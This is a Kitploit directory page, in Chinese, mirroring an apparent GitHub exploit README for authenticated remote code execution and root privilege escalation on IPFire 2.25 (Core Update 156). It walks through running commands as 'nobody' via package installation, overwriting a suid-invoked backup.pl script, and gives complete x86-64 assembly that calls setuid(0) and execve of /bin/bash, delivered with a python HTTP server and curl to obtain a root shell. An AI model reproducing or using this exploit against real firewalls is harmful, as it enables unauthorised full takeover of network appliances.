Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ipfire-2-25-auth-rce — ipfire 2.25 认证远程代码执行 | Kitploit
工具/GitHubGitHub/kaanaryoverflow/ipfire-2-25-auth-rce
权限提升漏洞分析漏洞利用Web应用程序漏洞利用Payload 开发二进制利用
GitHubkaanaryoverflow/ipfire-2-25-auth-rce

ipfire-2-25-auth-rce

ipfire 2.25 认证远程代码执行

查看仓库
225年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Ipfire 2-25(核心更新 156)经过身份验证的远程代码执行

  • 安装任意软件包时系统会运行命令

packfileinstallation

  • 系统仅从 HTML 中获取 7zip

pocpc0

  • 并检查 tmp 目录

pocpc1

  • 版本 2.25 - 核心更新 156

version

  • ipfire 允许登录后以 nobody 身份运行任意操作系统命令

获取 root 权限!

  • 检查 suid 二进制文件

find-suid

  • backup 程序会运行另一个脚本。/var/ipfire/backup/bin/backup.pl(它是一个 bash 脚本,权限看起来不错)

backup-tespiti

  • 尝试写入 bash 脚本。(没有错误。很好!)

yazma-denemesi

  • 尝试运行 bash

yazabilme-kanıtı

  • 是的。我们可以运行,但权限较低。我们必须触发 setuid(0)!
  • 保存此内容并运行 alti name.asm q
  • alti 是我在 soo_deep 仓库中的自用编译检查程序。
root@kitploit:~
bits 64
section .data
  string db "/bin/bash",0x00
  olmadis db "basarisiz.",0x0a,0x00
  olmadil equ $-olmadis
section .text
  global main
main:
  mov rax,105
  mov rdi,0
  syscall
  cmp rax,0
  je getbash

  mov rax,1
  mov rdi,1
  mov rsi,olmadis
  mov rdx,olmadil
  syscall

  mov rax,60
  xor rdi,rdi
  syscall

getbash:
  mov rax,59
  mov rdi,string
  mov rsi,0
  mov rdx,0
  syscall
  • 并将新程序写入 /var/ipfire/backup/bin/backup.pl。(我们可以用 python http server 和 curl 来写入)

  • 然后享受 root shell 吧!

image

下载工具